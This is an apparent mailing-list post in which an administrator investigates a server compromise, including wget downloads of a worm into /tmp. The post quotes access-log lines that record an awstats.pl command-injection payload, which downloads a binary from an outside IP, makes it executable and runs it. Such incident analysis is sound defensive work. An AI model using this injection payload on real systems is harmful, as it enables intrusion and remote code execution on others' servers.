On 4 Jan 2006, at 16:28, Joachim Schipper wrote: >> The messages in the log file indicate that they used some command >> injection in a script to call wget and download the files into /tmp. >> I'm fairly sure it was via a bad script, and I'm trying to locate >> which script was used, so far with no success. > > There was a phpBB2 in one of the paths used. If you have phpBB enabled > somewhere, that's a likely attack vector.
That was one of the locations that the linuxday worm was being downloaded from by the wget request. On 4 Jan 2006, at 16:35, Bryan Irvine wrote: > I'd suspect it has something more to do with an easy-to-guess > password. Even if the wget entries in the /var/www/logs/error_log correspond to the times and dates of the files in /tmp? bash-3.00# ls -lFa /tmp total 68 drwxrwxrwt 2 root wheel 512 Jan 4 18:10 ./ drwxr-xr-x 22 root wheel 512 Jun 29 2005 ../ -rw-r--r-- 1 www wheel 3355 Jan 2 04:14 .cpanel -rw-r--r-- 1 www wheel 18695 Jan 2 04:15 .cpanel.tmp -rw-r--r-- 1 www wheel 0 Jan 2 05:28 .plesk Some other suspect entries are these: 61.139.83.132 - - [02/Jan/2006:07:18:12 +0000] "GET /awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300 61.139.83.132 - - [02/Jan/2006:07:18:13 +0000] "GET /cgi-bin/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3bchmod%2 0%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 300 61.139.83.132 - - [02/Jan/2006:07:18:15 +0000] "GET /cgi-bin/awstats/ awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136% 2e48%2e69%2fmirela%3 bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo| HTTP/1.1" 404 308 Even though we don't have awstats installed anywhere (hence the 404). There are many 404 errors for this script. bash-3.00# locate awstats.pl bash-3.00# It's just a bit frustrating. Am I right in thinking if the wget output is in /var/www/logs/error_log then it comes from a site that has no defined ErrorLog. This is a limited number of sites, but I've found no log entries from the transfer logs for those sites that correspond with the times that wget was run. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
